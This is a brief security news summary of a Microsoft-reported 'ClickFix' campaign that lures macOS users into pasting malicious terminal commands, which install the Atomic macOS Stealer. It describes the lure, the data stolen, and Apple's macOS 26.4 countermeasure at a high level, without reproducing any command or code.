Microsoft security researchers have identified a sophisticated social engineering campaign using the "ClickFix" technique to trick macOS users into executing malicious terminal commands that compromise sensitive personal data.

Key Points

• Attackers host fake troubleshooting guides on platforms like Medium and Squarespace to lure users into copying malicious terminal commands.
• Executing these commands bypasses Apple’s Gatekeeper security, allowing malware like Atomic macOS Stealer to infect the system.
• The malware targets iCloud data, Telegram messages, browser passwords, and private cryptocurrency keys from wallets like Ledger and Trezor.
• Attackers utilize fileless methods, including curl and osascript, to run malicious code directly in memory, complicating traditional antivirus detection.
• Apple introduced a security update in macOS 26.4 that blocks suspicious terminal commands and displays a "Possible malware" warning to users.

Why it Matters

This campaign highlights a growing trend of attackers exploiting user trust to bypass built-in operating system defenses. By tricking individuals into manually executing code, hackers can exfiltrate high-value financial and personal data while remaining undetected by standard security software.